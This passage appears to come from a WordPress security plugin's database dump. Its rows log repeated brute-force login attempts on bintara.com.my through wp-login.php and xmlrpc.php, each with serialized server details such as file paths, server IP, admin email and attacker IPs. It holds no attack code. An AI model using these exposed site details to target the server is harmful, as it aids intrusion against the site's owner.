empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"203.146.253.85\";s:11:\"REMOTE_PORT\";s:5:\"43725\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIG-jYpjlmVadK6PeGc9AAAANM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568802558.2256\";s:12:\"REQUEST_TIME\";s:10:\"1568802558\";}}','notice','2019-09-18 10:29:20','2019-09-18 10:29:18',18258296,19555552,'https://bintara.com.my/xmlrpc.php',1,0,'203.146.253.85'),(25025,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.125.133\";s:11:\"REMOTE_PORT\";s:5:\"37204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIIMUQGijxhVPhG1M0v7QAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568802865.6636\";s:12:\"REQUEST_TIME\";s:10:\"1568802865\";}}','notice','2019-09-18 10:34:27','2019-09-18 10:34:26',17740888,19232536,'https://bintara.com.my/wp-login.php',1,0,'104.238.125.133'),(25026,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.125.133\";s:11:\"REMOTE_PORT\";s:5:\"37654\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIINDYpjlmVadK6PeGecgAAAM4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568802868.5508\";s:12:\"REQUEST_TIME\";s:10:\"1568802868\";}}','notice','2019-09-18 10:34:30','2019-09-18 10:34:28',18257944,19555424,'https://bintara.com.my/xmlrpc.php',1,0,'104.238.125.133'),(25027,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.137.124\";s:11:\"REMOTE_PORT\";s:5:\"55482\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIIqW4SfF9g@8lNlxxF4QAAAFQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568802985.5571\";s:12:\"REQUEST_TIME\";s:10:\"1568802985\";}}','notice','2019-09-18 10:36:26','2019-09-18 10:36:25',17741144,19230320,'https://bintara.com.my/wp-login.php',1,0,'167.71.137.124'),(25028,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.137.124\";s:11:\"REMOTE_PORT\";s:5:\"56126\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIIrDYpjlmVadK6PeGfEgAAAM4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568802988.681\";s:12:\"REQUEST_TIME\";s:10:\"1568802988\";}}','notice','2019-09-18 10:36:30','2019-09-18 10:36:29',18258296,19555552,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.137.124'),(25029,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.100.42\";s:11:\"REMOTE_PORT\";s:5:\"35914\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYILGFlvzIDnRn6zOHX9tQAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568803608.5308\";s:12:\"REQUEST_TIME\";s:10:\"1568803608\";}}','notice','2019-09-18 10:46:50','2019-09-18 10:46:49',17741144,19230320,'https://bintara.com.my/wp-login.php',1,0,'104.236.100.42'),(25030,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.100.42\";s:11:\"REMOTE_PORT\";s:5:\"36432\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYILHDYpjlmVadK6PeGieAAAAMM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568803612.3284\";s:12:\"REQUEST_TIME\";s:10:\"1568803612\";}}','notice','2019-09-18 10:46:54','2019-09-18 10:46:52',18258296,19555552,'https://bintara.com.my/xmlrpc.php',1,0,'104.236.100.42'),(25031,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"169.61.210.246\";s:11:\"REMOTE_PORT\";s:5:\"16672\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIL7FlvzIDnRn6zOHX9-gAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568803820.8406\";s:12:\"REQUEST_TIME\";s:10:\"1568803820\";}}','notice','2019-09-18 10:50:22','2019-09-18 10:50:21',17741248,19230320,'https://bintara.com.my/wp-login.php',1,0,'169.61.210.246'),(25032,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"169.61.210.246\";s:11:\"REMOTE_PORT\";s:5:\"50228\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYIL8FlvzIDnRn6zOHX@AAAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568803824.4351\";s:12:\"REQUEST_TIME\";s:10:\"1568803824\";}}','notice','2019-09-18 10:50:26','2019-09-18 10:50:24',18258296,19555552,'https://bintara.com.my/xmlrpc.php',1,0,'169.61.210.246'),(25033,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 